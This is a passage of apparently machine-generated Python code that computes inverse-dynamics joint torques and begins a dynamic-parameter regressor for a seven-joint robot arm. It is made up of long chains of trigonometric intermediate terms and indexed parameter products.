x166 = -parms[66]*(x152 + x97) - parms[67]*(-x153 - x165) - parms[68]*(x116 + x164) - parms[69]*x134 + parms[78]*(-x118 + x160) + parms[79]*(x125 + x157) + parms[80]*(-x155 - x161) + parms[81]*x135
x167 = parms[54]*(-x148 - x149) + parms[55]*(x150 + x94) + parms[56]*(x147 + x88) + parms[57]*x85 + x133*x163 + x166*x90
x168 = parms[37]*x42 + parms[39]*x45 + parms[40]*x39
x169 = parms[48]*x84 + parms[49]*x88 + parms[50]*x67 + parms[55]*x109 + parms[56]*x103 - x132*x90 + x133*x141 + x144*x70 - x72*x87
x170 = x70*x72
x171 = ((x74)*(x74))
x172 = parms[54]*(x150 + x67) + parms[55]*(-x148 - x171) + parms[56]*(x170 + x89) + parms[57]*x83 - parms[66]*(x119 + x151) - parms[67]*(x102 + x164) - parms[68]*(-x154 - x165) - parms[69]*x103 - x112*x159 - x114*x162
x173 = x172*x68
x174 = parms[36]*x61 + parms[37]*x63 + parms[38]*x58 + parms[43]*x66 - parms[44]*x108 + x146*x73 - 0.27747*x167*x69 - x168*x39 + x169*x68 - 0.27747*x173 + x45*x59
x175 = parms[24]*x31 + parms[25]*x37 + parms[26]*x36 + parms[31]*x35 + parms[32]*x30 + x107*x143 + x12*x4 - x13*x9 + x174*x41
x176 = -x1
x177 = parms[42]*(x58 + x80) + parms[43]*x106 + parms[44]*(-x61 + x76) + parms[45]*x108 + parms[54]*(x147 + x96) + parms[55]*(x170 + x84) + parms[56]*(-x149 - x171) + parms[57]*x109 + x163*x90 + x166*x92
x178 = x39*x42
x179 = ((x45)*(x45))
x180 = x167*x68
x181 = parms[42]*(-x104 - x179) + parms[43]*x81 + parms[44]*(x178 + x63) + parms[45]*x57 + x172*x73 + x180
x182 = parms[30]*x49 + parms[31]*(-x36 + x64) + parms[32]*(x37 + x54) + parms[33]*x51 + x107*x177 + x181*x41
x183 = x182*x2
x184 = parms[38]*x61 + parms[40]*x63 + parms[41]*x58 + parms[42]*x108 - parms[43]*x57 - x146*x68 + x168*x42 + x169*x73 + 0.27747*x172*x69 - 0.27747*x180 - x45*x46
x185 = x181*x40
x186 = x177*x41
x187 = parms[24]*x11 + parms[25]*x4 + parms[26]*x9
x188 = parms[25]*x31 + parms[27]*x37 + parms[28]*x36 - parms[30]*x35 + parms[32]*x51 - x11*x12 - x184 + 0.00502*x185 + 0.00502*x186 + x187*x9
x189 = ((x11)*(x11))
x190 = x4*x9
x191 = parms[42]*(x178 - x63) + parms[43]*x77 + parms[44]*(-x105 - x179) + parms[45]*x66 + x167*x73 - x173
x192 = parms[30]*x65 + parms[31]*(-x189 - x47) + parms[32]*(x190 + x62) + parms[33]*x29 - x191
x193 = x1*x192
x194 = dq[1]*parms[17] + parms[14]*x3 + parms[16]*x7
x195 = dq[1]*parms[16] + parms[13]*x3 + parms[15]*x7
x196 = dq[1]*parms[14] + parms[12]*x3 + parms[13]*x7
x197 = parms[26]*x31 + parms[28]*x37 + parms[29]*x36 + parms[30]*x29 - parms[31]*x51 + x11*x13 + x143*x41 + x174*x40 + x187*x38 + 0.00502*x191
#
tau_out[0] = ddq[0]*parms[5] + parms[6]*x17 + parms[7]*x32 + x0*(ddq[1]*parms[14] - dq[1]*x195 + parms[12]*x21 + parms[13]*x15 + parms[19]*x18 + parms[20]*x34 + x175*x176 - 0.27857*x183 + x188*x50 + 0.27857*x193 + x194*x7) + x6*(ddq[1]*parms[16] + dq[1]*x196 + parms[13]*x21 + parms[15]*x15 + parms[18]*x19 + parms[20]*x25 + x10*x194 + 0.03175*x183 - 0.03175*x193 - x197)
tau_out[1] = ddq[1]*parms[17] + parms[14]*x21 + parms[16]*x15 + parms[18]*x33 + parms[19]*x26 + 0.03175*parms[30]*x55 + 0.03175*parms[31]*(x190 + x31) + 0.03175*parms[32]*(-x189 - x48) + 0.03175*parms[33]*x35 - 0.27857*x1*x182 + x175*x2 + x176*x188 + 0.03175*x185 + 0.03175*x186 - 0.27857*x192*x2 + x195*x3 + x196*x8
tau_out[2] = x197
tau_out[3] = x184
tau_out[4] = x142
tau_out[5] = x145
tau_out[6] = x131
#
return tau_out
def regressor( q, dq, ddq ) :
#
regressor_out = [0]*588
#
x0 = 9.81*sin(q[0])
x1 = -9.81*cos(q[0])
x2 = -x1
x3 = sin(q[1])
x4 = -x3
x5 = dq[0]*x4
x6 = dq[1]*x5
x7 = cos(q[1])
x8 = ddq[0]*x7 + x6
x9 = dq[0]*x7
x10 = dq[1]*x9
x11 = -ddq[0]*x3 - x10
x12 = -x10
x13 = x6 + x8
x14 = x5*x9
x15 = ddq[1] + x14
x16 = ((x9)*(x9))
x17 = ((dq[1])*(dq[1]))
x18 = -x6
x19 = -x14
x20 = ((x5)*(x5))
x21 = -x0
x22 = -x21
x23 = x1*x4
x24 = x2*x7
x25 = -x24
x26 = sin(q[2])
x27 = -x26
x28 = cos(q[2])
x29 = dq[1]*x28 + x27*x9
x30 = -dq[1]*x26 - x28*x9
x31 = x29*x30
x32 = -x31
x33 = ddq[1]*x28 + dq[2]*x30 - x26*x8
x34 = dq[2] - x5
x35 = x29*x34
x36 = -ddq[1]*x26 - dq[2]*x29 - x28*x8
x37 = -x35
x38 = x36 + x37
x39 = x30*x34
x40 = x33 + x39
x41 = ((x30)*(x30))
x42 = ((x29)*(x29))
x43 = -x41 + x42
x44 = ((x34)*(x34))
x45 = -x42 + x44
x46 = -x11
x47 = ddq[2] + x46
x48 = x31 + x47
x49 = x26*x48
x50 = -x39
x51 = x33 + x50
x52 = x35 + x36
x53 = x32 + x47
x54 = x41 - x44
x55 = -x47
x56 = -x41 - x44
x57 = x28*x56
x58 = 0.03175*x15 - 0.27857*x16 - 0.27857*x17 + x25
x59 = -x58
x60 = -x28
x61 = 0.03175*x10 + 0.27857*x13 + x22 + 0.03175*x46
x62 = -x23
x63 = -0.27857*ddq[1] + 0.27857*x14 - 0.03175*x17 - 0.03175*x20 + x62
x64 = x26*x61 + x28*x63
x65 = -x64
x66 = x31 + x55
x67 = x28*x66
x68 = -x42 - x44
x69 = x26*x68
x70 = x26*x63 + x60*x61
x71 = -x70
x72 = x28*x52
x73 = -x33
x74 = x39 + x73
x75 = x26*x74
x76 = x26*x64
x77 = x28*x70
x78 = sin(q[3])
x79 = cos(q[3])
x80 = x29*x79 + x34*x78
x81 = dq[3] - x30
x82 = x80*x81
x83 = -x78
x84 = x34*x79
x85 = x29*x78
x86 = -dq[3]
x87 = x33*x79 + x47*x78 + x86*(-x84 + x85)
x88 = x79*x87 + x82*x83
x89 = x84 - x85
x90 = x80*x89
x91 = -x90
x92 = -x91
x93 = x78*x87 + x79*x82
x94 = x81*x89
x95 = x87 + x94
x96 = x47*x79 + x73*x78 + x80*x86
x97 = -x82
x98 = x96 + x97
x99 = x79*x98 + x83*x95
x100 = ((x80)*(x80))
x101 = ((x89)*(x89))
x102 = x100 - x101
x103 = -x102
x104 = x78*x98 + x79*x95
x105 = ((x81)*(x81))
x106 = -x100 + x105
x107 = -x36
x108 = ddq[3] + x107
x109 = x108 + x90
x110 = x106*x79 + x109*x78
x111 = x109*x79
x112 = x106*x83 + x111
x113 = -x94
x114 = x113 + x87
x115 = -x114
x116 = x113*x78 + x79*x96
x117 = -x96
x118 = x113*x79 + x117*x78
x119 = x108 + x91
x120 = x101 - x105
x121 = x119*x83 + x120*x79
x122 = x82 + x96
x123 = -x122
x124 = x119*x79 + x120*x78
x125 = x78*x94 + x79*x97
x126 = -x108
x127 = x79*x94 + x83*x97
x128 = x117 + x82
x129 = -x128
x130 = x129*x26
x131 = -x101 - x105
x132 = x109*x83 + x131*x79
x133 = x132*x28
x134 = x107 + x35
x135 = -0.00502*x134 + x58
x136 = -0.00502*x56 + x70
x137 = x135*x79 + x136*x83
x138 = -x137
x139 = x131*x78
x140 = 0.00502*x111 + x138 + 0.00502*x139
x141 = 0.00502*x48 + x65
x142 = -x141
x143 = x142*x83
x144 = 0.00502*x128 + x142*x79
x145 = -x100 - x105
x146 = x126 + x90
x147 = x145*x83 + x146*x79
x148 = x147*x28
x149 = -x95
x150 = x149*x26
x151 = x141*x78 + 0.00502*x95
x152 = x145*x79
x153 = x146*x78
x154 = x135*x78 + x136*x79
x155 = -x154
x156 = 0.00502*x152 + 0.00502*x153 - x155
x157 = x141*x79
x158 = -x100 - x101
x159 = x154*x79
x160 = x138*x78 + 0.00502*x158 + x159
x161 = -x87 + x94
x162 = x122*x79 + x161*x83
x163 = x162*x28
x164 = -x158
x165 = x164*x26
x166 = x122*x78 + x161*x79
x167 = 0.00502*x166
x168 = x138*x79 + x154*x83
x169 = x137*x83 + x159
x170 = x169*x28
x171 = x137*x79 + x154*x78
x172 = 0.00502*x171
x173 = x142*x26
x174 = 0.00502*x141
x175 = cos(q[4])
x176 = sin(q[4])
x177 = -x176
x178 = x175*x80 + x177*x81
x179 = dq[4] + x89
x180 = x178*x179
x181 = -x175*x81 - x176*x80
x182 = dq[4]*x181 + x126*x176 + x175*x87
x183 = -x175*x180 - x176*x182
x184 = -x183
x185 = x178*x181
x186 = -x185
x187 = x175*x182 + x177*x180
x188 = x186*x83 + x187*x79
x189 = x186*x79 + x187*x78
x190 = x179*x181
x191 = x182 + x190
x192 = -x180
x193 = -dq[4]*x178 - x108*x175 - x176*x87
x194 = x192 + x193
x195 = -x175*x191 - x176*x194
x196 = -x195
x197 = ((x181)*(x181))
x198 = ((x178)*(x178))
x199 = -x197 + x198
x200 = x175*x194 + x177*x191
x201 = x199*x83 + x200*x79
x202 = x199*x79 + x200*x78
x203 = ddq[4] + x96
x204 = x185 + x203
x205 = x176*x204
x206 = ((x179)*(x179))
x207 = -x198 + x206
x208 = -x175*x207 - x205
x209 = -x208
x210 = -x190
x211 = x182 + x210
x212 = x175*x204
x213 = x177*x207 + x212
x214 = x211*x83 + x213*x79
x215 = x211*x79 + x213*x78
x216 = -x175*x193 - x176*x210
x217 = -x216
x218 = x175*x210 + x177*x193
x219 = x185*x83 + x218*x79
x220 = x185*x79 + x218*x78
x221 = x186 + x203
x222 = x197 - x206
x223 = -x175*x221 - x176*x222
x224 = -x223
x225 = x180 + x193
x226 = x175*x222 + x177*x221
x227 = x225*x83 + x226*x79
x228 = x225*x79 + x226*x78
x229 = -x175*x192 - x176*x190
x230 = -x229
x231 = -x203
x232 = x175*x190 + x177*x192
x233 = x231*x78 + x232*x79
x234 = x203*x79 + x232*x78
x235 = x137 + 0.27747*x145
x236 = -x235
x237 = -x197 - x206
x238 = x176*x237
x239 = -x176*x236 - 0.27747*x212 - 0.27747*x238
x240 = x141 + 0.27747*x95
x241 = 0.27747*x146 + x154
x242 = -x175*x240 - x176*x241
x243 = -x242
x244 = x239*x79 + x243*x78
x245 = -x212 - x238
x246 = -x245
x247 = x246*x26
x248 = x175*x237
x249 = x177*x204 + x248
x250 = x249*x78
x251 = -x175
x252 = 0.27747*x205 + x236*x251 - 0.27747*x248
x253 = -x193
x254 = x180 + x253
x255 = x254*x79
x256 = 0.00502*x250 - x252 + 0.00502*x255
x257 = x249*x79 + x254*x83
x258 = x257*x28
x259 = x239*x78 + x242*x79 + 0.00502*x245
x260 = x185 + x231
x261 = x175*x260
x262 = -x198 - x206
x263 = x177*x262 + x261
x264 = x191*x83 + x263*x79
x265 = x264*x28
x266 = x263*x78
x267 = 0.27747*x176
x268 = x177*x235 - 0.27747*x261 + x262*x267
x269 = x191*x79
x270 = 0.00502*x266 - x268 + 0.00502*x269
x271 = x176*x260
x272 = x175*x262
x273 = x175*x235 - 0.27747*x271 - 0.27747*x272
x274 = x175*x241 + x177*x240
x275 = -x274
x276 = x273*x79 + x275*x83
x277 = -x271 - x272
x278 = -x277
x279 = x26*x278
x280 = x273*x78 + x275*x79 + 0.00502*x277
x281 = x176*x225
x282 = -x182
x283 = x190 + x282
x284 = x175*x283
x285 = x175*x243 + x177*x274 - 0.27747*x281 - 0.27747*x284
x286 = -x281 - x284
x287 = x285*x78 + 0.00502*x286
x288 = x175*x225
x289 = x177*x283 + x288
x290 = -x197 - x198
x291 = x289*x79 + x290*x83
x292 = x28*x291
x293 = -x286
x294 = x26*x293
x295 = x285*x79
x296 = x290*x79
x297 = x289*x78
x298 = x175*x275 + x177*x243 + x267*x283 - 0.27747*x288
x299 = 0.00502*x296 + 0.00502*x297 - x298
x300 = x175*x242 + x176*x274
x301 = -x300
x302 = -x301
x303 = x26*x302
x304 = x175*x274
x305 = x177*x242 + x304
x306 = x235*x83 + x305*x79
x307 = x28*x306
x308 = x305*x78
x309 = x242*x267 - 0.27747*x304
x310 = x235*x79
x311 = 0.00502*x308 - x309 + 0.00502*x310
x312 = -0.27747*x300
x313 = x312*x79
x314 = 0.00502*x301 + x312*x78
x315 = sin(q[5])
x316 = cos(q[5])
x317 = -x178*x316 - x179*x315
x318 = dq[5]*x317 + x203*x316 + x282*x315
x319 = x178*x315
x320 = x179*x316
x321 = -x319 + x320
x322 = dq[5] - x181
x323 = x321*x322
x324 = -x315*x318 - x316*x323
x325 = x317*x321
x326 = -x325
x327 = -x326
x328 = x175*x324 + x177*x327
x329 = -x315
x330 = x316*x318 + x323*x329
x331 = x328*x78 + x330*x79
x332 = x328*x79 + x330*x83
x333 = -x175*x327 - x176*x324
x334 = -x333
x335 = dq[5]*(x319 - x320) + x231*x315 + x282*x316
x336 = -x323
x337 = x335 + x336
x338 = x317*x322
x339 = x318 + x338
x340 = x316*x337 + x329*x339
x341 = -x315*x337 - x316*x339
x342 = ((x317)*(x317))
x343 = ((x321)*(x321))
x344 = -x342 + x343
x345 = -x344
x346 = x175*x341 + x177*x345
x347 = x340*x79 + x346*x78
x348 = x340*x83 + x346*x79
x349 = -x175*x345 - x176*x341
x350 = -x349
x351 = ((x322)*(x322))
x352 = -x343 + x351
x353 = ddq[5] + x253
x354 = x325 + x353
x355 = x316*x354
x356 = x329*x352 + x355
x357 = -x315*x354 - x316*x352
x358 = -x338
x359 = x318 + x358
x360 = -x359
x361 = x175*x357 + x177*x360
x362 = x356*x83 + x361*x79
x363 = -x175*x360 - x176*x357
x364 = -x363
x365 = x356*x79 + x361*x78
x366 = -x335
x367 = x315*x366 + x316*x358
x368 = -x315*x358 - x316*x335
x369 = x175*x368 + x177*x326
x370 = x367*x83 + x369*x79
x371 = -x175*x326 - x176*x368
x372 = -x371
x373 = x367*x79 + x369*x78
x374 = x342 - x351
x375 = x326 + x353
x376 = -x315*x374 - x316*x375
x377 = x323 + x335
x378 = -x377
x379 = x175*x376 + x177*x378
x380 = x316*x374 + x329*x375
x381 = x379*x78 + x380*x79
x382 = -x175*x378 - x176*x376
x383 = -x382
x384 = x379*x79 + x380*x83
x385 = -x315*x338 - x316*x336
x386 = -x353
x387 = x175*x385 + x177*x386
x388 = x316*x338 + x329*x336
x389 = x387*x78 + x388*x79
x390 = x387*x79 + x388*x83
x391 = -x175*x386 - x176*x385
x392 = -x391
x393 = -x323 - x366
x394 = -x235*x315 - x274*x316
x395 = -x394
x396 = -x243
x397 = -x316*x396
x398 = -x342 - x351
x399 = -x315*x398 - x355
x400 = x175*x399
x401 = x177*x397 + x251*x395 + x267*x393 - 0.27747*x400
x402 = x177*x393 + x400
x403 = x402*x78
x404 = x316*x398 + x329*x354
x405 = x404*x79
x406 = -x401 + 0.00502*x403 + 0.00502*x405
x407 = x175*x393
x408 = x176*x399
x409 = -x407 - x408
x410 = -x409
x411 = x26*x410
x412 = x175*x397 + x177*x395 - 0.27747*x407 - 0.27747*x408
x413 = x329*x396
x414 = x412*x79 + x413*x83
x415 = x402*x79 + x404*x83
x416 = x28*x415
x417 = 0.00502*x409 + x412*x78 + x413*x79
x418 = -x339
x419 = x243*x329
x420 = x235*x316 + x275*x315
x421 = -x420
x422 = -x421
x423 = -x343 - x351
x424 = x325 + x386
x425 = -x315*x424 - x316*x423
x426 = x175*x425
x427 = x177*x419 + x251*x422 + x267*x418 - 0.27747*x426
x428 = x177*x418 + x426
x429 = x428*x78
x430 = x316*x424 + x329*x423
x431 = x430*x79
x432 = -x427 + 0.00502*x429 + 0.00502*x431
x433 = x175*x418
x434 = x176*x425
x435 = -x433 - x434
x436 = -x435
x437 = x26*x436
x438 = x428*x79 + x430*x83
x439 = x28*x438
x440 = x175*x419 + x177*x422 - 0.27747*x433 - 0.27747*x434
x441 = x243*x316
x442 = x440*x79 + x441*x83
x443 = 0.00502*x435 + x440*x78 + x441*x79
x444 = x316*x395 + x329*x420
x445 = x315*x395 + x316*x420
x446 = -x445
x447 = x342 + x343
x448 = x175*x447
x449 = -x318
x450 = x338 + x449
x451 = -x315*x377 - x316*x450
x452 = x176*x451
x453 = x175*x446 - 0.27747*x448 - 0.27747*x452
x454 = -x448 - x452
x455 = x444*x79 + x453*x78 + 0.00502*x454
x456 = -x454
x457 = x26*x456
x458 = x175*x451
x459 = x177*x447 + x458
x460 = x316*x377 + x329*x450
x461 = x459*x79 + x460*x83
x462 = x28*x461
x463 = x459*x78
x464 = x460*x79
x465 = x177*x446 + x267*x447 - 0.27747*x458
x466 = 0.00502*x463 + 0.00502*x464 - x465
x467 = x444*x83 + x453*x79
x468 = -x315*x420 - x316*x394
x469 = x175*x396 + x176*x468
x470 = -x469
x471 = -0.27747*x469
x472 = 0.00502*x470 + x471*x78
x473 = -x470
x474 = x26*x473
x475 = x175*x468
x476 = x177*x396 + x475
x477 = x445*x83 + x476*x79
x478 = x28*x477
x479 = x267*x396 - 0.27747*x475
x480 = x445*x79
x481 = x476*x78
x482 = -x479 + 0.00502*x480 + 0.00502*x481
x483 = x471*x79
x484 = cos(q[6])
x485 = sin(q[6])
x486 = -x321*x484 - x322*x485
x487 = dq[6]*x486 + x353*x484 + x449*x485
x488 = -x485
x489 = x321*x485
x490 = x322*x484
x491 = -x489 + x490
x492 = dq[6] - x317
x493 = x491*x492
x494 = x484*x487 + x488*x493
x495 = -x494
x496 = -x484*x493 - x485*x487
x497 = x486*x491
x498 = -x497
x499 = -x498
x500 = -x315*x496 - x316*x499
x501 = x175*x500 + x177*x495
x502 = x316*x496 + x329*x499
x503 = x501*x78 + x502*x79
x504 = -x175*x495 - x176*x500
x505 = -x504
x506 = x501*x79 + x502*x83
x507 = ((x486)*(x486))
x508 = ((x491)*(x491))
x509 = -x507 + x508
x510 = -x509
x511 = x486*x492
x512 = x487 + x511
x513 = dq[6]*(x489 - x490) + x386*x485 + x449*x484
x514 = -x493
x515 = x513 + x514
x516 = -x484*x512 - x485*x515
x517 = -x315*x516 - x316*x510
x518 = x484*x515 + x488*x512
x519 = -x518
x520 = -x175*x519 - x176*x517
x521 = -x520
x522 = x316*x516 + x329*x510
x523 = x175*x517 + x177*x519
x524 = x522*x83 + x523*x79
x525 = x522*x79 + x523*x78
x526 = ((x492)*(x492))
x527 = -x508 + x526
x528 = ddq[6] + x366
x529 = x497 + x528
x530 = -x484*x527 - x485*x529
x531 = -x511
x532 = x487 + x531
x533 = -x532
x534 = -x315*x530 - x316*x533
x535 = x484*x529
x536 = x488*x527 + x535
x537 = -x536
x538 = -x175*x537 - x176*x534
x539 = -x538
x540 = x316*x530 + x329*x533
x541 = x175*x534 + x177*x537
x542 = x540*x83 + x541*x79
x543 = x540*x79 + x541*x78
x544 = -x484*x513 - x485*x531
x545 = -x315*x544 - x316*x498
x546 = -x513
x547 = x484*x531 + x485*x546
x548 = -x547
x549 = x175*x545 + x177*x548
x550 = x316*x544 + x329*x498
x551 = x549*x78 + x550*x79
x552 = -x175*x548 - x176*x545
x553 = -x552
x554 = x549*x79 + x550*x83
x555 = x493 + x513
x556 = -x555
x557 = x507 - x526
x558 = x498 + x528
x559 = -x484*x558 - x485*x557
x560 = -x315*x559 - x316*x556
x561 = x484*x557 + x488*x558
x562 = -x561
x563 = x175*x560 + x177*x562
x564 = x316*x559 + x329*x556
x565 = x563*x78 + x564*x79
x566 = -x175*x562 - x176*x560
x567 = -x566
x568 = x563*x79 + x564*x83
x569 = x484*x511 + x488*x514
x570 = -x569
x571 = -x528
x572 = -x484*x514 - x485*x511
x573 = -x315*x572 - x316*x571
x574 = x175*x573 + x177*x570
x575 = x316*x572 + x329*x571
x576 = x574*x78 + x575*x79
x577 = -x175*x570 - x176*x573
x578 = -x577
x579 = x574*x79 + x575*x83
x580 = -x395
x581 = -x484*x580
x582 = -x243*x485 - x420*x484
x583 = -x582
x584 = -x315*x581 - x316*x583
x585 = -x507 - x526
x586 = -x484*x585 - x488*x529
x587 = x175*x586
x588 = x488*x580
x589 = -x588
x590 = -x493 - x546
x591 = -x485*x585 - x535
x592 = -x315*x591 - x316*x590
x593 = x176*x592
x594 = x175*x584 + x177*x589 - 0.27747*x587 - 0.27747*x593
x595 = -x587 - x593
x596 = x316*x581 + x329*x583
x597 = x594*x78 + 0.00502*x595 + x596*x79
x598 = x316*x591 + x329*x590
x599 = x175*x592
x600 = x177*x586 + x599
x601 = x598*x83 + x600*x79
x602 = x28*x601
x603 = -x595
x604 = x26*x603
x605 = x598*x79
x606 = x177*x584 + x251*x589 + x267*x586 - 0.27747*x599
x607 = x600*x78
x608 = 0.00502*x605 - x606 + 0.00502*x607
x609 = x594*x79 + x596*x83
x610 = x395*x488
x611 = x243*x484 + x421*x485
x612 = -x611
x613 = -x612
x614 = -x315*x610 - x316*x613
x615 = -x508 - x526
x616 = x497 + x571
x617 = -x484*x616 - x488*x615
x618 = x175*x617
x619 = x395*x484
x620 = -x619
x621 = -x512
x622 = -x484*x615 - x485*x616
x623 = -x315*x622 - x316*x621
x624 = x176*x623
x625 = x175*x614 + x177*x620 - 0.27747*x618 - 0.27747*x624
x626 = -x618 - x624
x627 = x316*x610 + x329*x613
x628 = x625*x78 + 0.00502*x626 + x627*x79
x629 = x175*x623
x630 = x177*x617 + x629
x631 = x316*x622 + x329*x621
x632 = x630*x79 + x631*x83
x633 = x28*x632
x634 = -x626
x635 = x26*x634
x636 = x177*x614 + x251*x620 + x267*x617 - 0.27747*x629
x637 = x630*x78
x638 = x631*x79
x639 = -x636 + 0.00502*x637 + 0.00502*x638
x640 = x625*x79 + x627*x83
x641 = x507 + x508
x642 = -x487 + x511
x643 = -x484*x642 - x485*x555
x644 = -x315*x643 - x316*x641
x645 = x176*x644
x646 = -x484*x555 - x488*x642
x647 = x175*x646
x648 = -x645 - x647
x649 = -x648
x650 = x26*x649
x651 = x175*x644
x652 = x177*x646 + x651
x653 = x316*x643 + x329*x641
x654 = x652*x79 + x653*x83
x655 = x28*x654
x656 = x484*x583 + x488*x611
x657 = -x656
x658 = x484*x611
x659 = -x485*x583 - x658
x660 = x329*x659
x661 = x175*x660 + x177*x657 - 0.27747*x645 - 0.27747*x647
x662 = x316*x659
x663 = 0.00502*x648 + x661*x78 + x662*x79
x664 = x653*x79
x665 = x652*x78
x666 = x177*x660 + x251*x657 + x267*x646 - 0.27747*x651
x667 = 0.00502*x664 + 0.00502*x665 - x666
x668 = x661*x79 + x662*x83
x669 = -x488*x582 - x658
x670 = -x484*x582 - x485*x611
x671 = -x315*x670 - x316*x580
x672 = x175*x669 + x176*x671
x673 = -0.27747*x672
x674 = x673*x79
x675 = x175*x671
x676 = x267*x669 - 0.27747*x675
x677 = x177*x669 + x675
x678 = x677*x78
x679 = x316*x670 + x329*x580
x680 = x679*x79
x681 = -x676 + 0.00502*x678 + 0.00502*x680
x682 = -x672
x683 = -x682
x684 = x26*x683
x685 = x677*x79 + x679*x83
x686 = x28*x685
x687 = x673*x78 + 0.00502*x682
x688 = x28*x48
#
regressor_out[0] = 0
regressor_out[1] = 0
regressor_out[2] = 0
regressor_out[3] = 0
regressor_out[4] = 0
regressor_out[5] = ddq[0]
regressor_out[6] = x0
regressor_out[7] = x2
regressor_out[8] = 0
regressor_out[9] = 0
regressor_out[10] = dq[0]
regressor_out[11] = sign(dq[0])
regressor_out[12] = x10*x4 + x7*x8
regressor_out[13] = x13*x4 + x7*(x11 + x12)
regressor_out[14] = x15*x7 + x4*(-x16 + x17)
regressor_out[15] = x11*x4 + x18*x7
regressor_out[16] = x4*(ddq[1] + x19) + x7*(-x17 + x20)
regressor_out[17] = x12*x4 + x6*x7
regressor_out[18] = x22*x4
regressor_out[19] = x21*x7
regressor_out[20] = x23*x4 + x25*x7
regressor_out[21] = 0
regressor_out[22] = 0
regressor_out[23] = 0
regressor_out[24] = -x32*x4 + x7*(-x26*x33 - x28*x35)
regressor_out[25] = -x4*x43 + x7*(-x26*x38 - x28*x40)
regressor_out[26] = -x4*x51 + x7*(-x28*x45 - x49)
regressor_out[27] = x32*x4 + x7*(-x26*x50 - x28*x36)
regressor_out[28] = -x4*x52 + x7*(-x26*x54 - x28*x53)
regressor_out[29] = x4*x55 + x7*(-x26*x39 - x28*x37)
regressor_out[30] = x4*(-0.03175*x49 + 0.03175*x57 + x65) + x7*(0.27857*x49 - 0.27857*x57 + x59*x60)
regressor_out[31] = x4*(0.03175*x67 - 0.03175*x69 - x71) + x7*(x27*x58 - 0.27857*x67 + 0.27857*x69)
regressor_out[32] = x4*(0.03175*x72 - 0.03175*x75) + x7*(x27*x65 + x60*x70 - 0.27857*x72 + 0.27857*x75)
regressor_out[33] = x4*(-0.03175*x76 + 0.03175*x77) + x7*(0.27857*x76 - 0.27857*x77)
regressor_out[34] = 0
regressor_out[35] = 0
regressor_out[36] = -x4*x93 + x7*(-x26*x88 - x28*x92)
regressor_out[37] = -x104*x4 + x7*(-x103*x28 - x26*x99)
regressor_out[38] = -x110*x4 + x7*(-x112*x26 - x115*x28)
regressor_out[39] = -x116*x4 + x7*(-x118*x26 - x28*x91)
regressor_out[40] = -x124*x4 + x7*(-x121*x26 - x123*x28)
regressor_out[41] = -x125*x4 + x7*(-x126*x28 - x127*x26)
regressor_out[42] = x4*(-0.03175*x130 + 0.03175*x133 - x144) + x7*(0.27857*x130 - 0.27857*x133 + x140*x60 + x143*x27)
regressor_out[43] = x4*(0.03175*x148 - 0.03175*x150 - x151) + x7*(-0.27857*x148 + 0.27857*x150 + x156*x60 + x157*x27)
regressor_out[44] = x4*(-x160 + 0.03175*x163 - 0.03175*x165) + x7*(-0.27857*x163 + 0.27857*x165 + x167*x60 + x168*x27)
regressor_out[45] = x4*(0.03175*x170 - 0.03175*x173 - x174) + x7*(-0.27857*x170 + x172*x60 + 0.27857*x173)
regressor_out[46] = 0
regressor_out[47] = 0
regressor_out[48] = -x189*x4 + x7*(-x184*x28 - x188*x26)
regressor_out[49] = -x202*x4 + x7*(-x196*x28 - x201*x26)
regressor_out[50] = -x215*x4 + x7*(-x209*x28 - x214*x26)
regressor_out[51] = -x220*x4 + x7*(-x217*x28 - x219*x26)
regressor_out[52] = -x228*x4 + x7*(-x224*x28 - x227*x26)
regressor_out[53] = -x234*x4 + x7*(-x230*x28 - x233*x26)
regressor_out[54] = x4*(-0.03175*x247 + 0.03175*x258 - x259) + x7*(x244*x27 + 0.27857*x247 + x256*x60 - 0.27857*x258)
regressor_out[55] = x4*(0.03175*x265 - 0.03175*x279 - x280) + x7*(-0.27857*x265 + x27*x276 + x270*x60 + 0.27857*x279)
regressor_out[56] = x4*(-x287 + 0.03175*x292 - 0.03175*x294) + x7*(x27*x295 - 0.27857*x292 + 0.27857*x294 + x299*x60)
regressor_out[57] = x4*(-0.03175*x303 + 0.03175*x307 - x314) + x7*(x27*x313 + 0.27857*x303 - 0.27857*x307 + x311*x60)
regressor_out[58] = 0
regressor_out[59] = 0
regressor_out[60] = -x331*x4 + x7*(-x26*x332 - x28*x334)
regressor_out[61] = -x347*x4 + x7*(-x26*x348 - x28*x350)
regressor_out[62] = -x365*x4 + x7*(-x26*x362 - x28*x364)
regressor_out[63] = -x373*x4 + x7*(-x26*x370 - x28*x372)
regressor_out[64] = -x381*x4 + x7*(-x26*x384 - x28*x383)
regressor_out[65] = -x389*x4 + x7*(-x26*x390 - x28*x392)
regressor_out[66] = x4*(-0.03175*x411 + 0.03175*x416 - x417) + x7*(x27*x414 + x406*x60 + 0.27857*x411 - 0.27857*x416)
regressor_out[67] = x4*(-0.03175*x437 + 0.03175*x439 - x443) + x7*(x27*x442 + x432*x60 + 0.27857*x437 - 0.27857*x439)
regressor_out[68] = x4*(-x455 - 0.03175*x457 + 0.03175*x462) + x7*(x27*x467 + 0.27857*x457 - 0.27857*x462 + x466*x60)
regressor_out[69] = x4*(-x472 - 0.03175*x474 + 0.03175*x478) + x7*(x27*x483 + 0.27857*x474 - 0.27857*x478 + x482*x60)
regressor_out[70] = 0
regressor_out[71] = 0
regressor_out[72] = -x4*x503 + x7*(-x26*x506 - x28*x505)
regressor_out[73] = -x4*x525 + x7*(-x26*x524 - x28*x521)
regressor_out[74] = -x4*x543 + x7*(-x26*x542 - x28*x539)
regressor_out[75] = -x4*x551 + x7*(-x26*x554 - x28*x553)
regressor_out[76] = -x4*x565 + x7*(-x26*x568 - x28*x567)
regressor_out[77] = -x4*x576 + x7*(-x26*x579 - x28*x578)
regressor_out[78] = x4*(-x597 + 0.03175*x602 - 0.03175*x604) + x7*(x27*x609 + x60*x608 - 0.27857*x602 + 0.27857*x604)
regressor_out[79] = x4*(-x628 + 0.03175*x633 - 0.03175*x635) + x7*(x27*x640 + x60*x639 - 0.27857*x633 + 0.27857*x635)
regressor_out[80] = x4*(-0.03175*x650 + 0.03175*x655 - x663) + x7*(x27*x668 + x60*x667 + 0.27857*x650 - 0.27857*x655)
regressor_out[81] = x4*(-0.03175*x684 + 0.03175*x686 - x687) + x7*(x27*x674 + x60*x681 + 0.27857*x684 - 0.27857*x686)
regressor_out[82] = 0
regressor_out[83] = 0
regressor_out[84] = 0
regressor_out[85] = 0
regressor_out[86] = 0
regressor_out[87] = 0
regressor_out[88] = 0
regressor_out[89] = 0
regressor_out[90] = 0
regressor_out[91] = 0
regressor_out[92] = 0
regressor_out[93] = 0
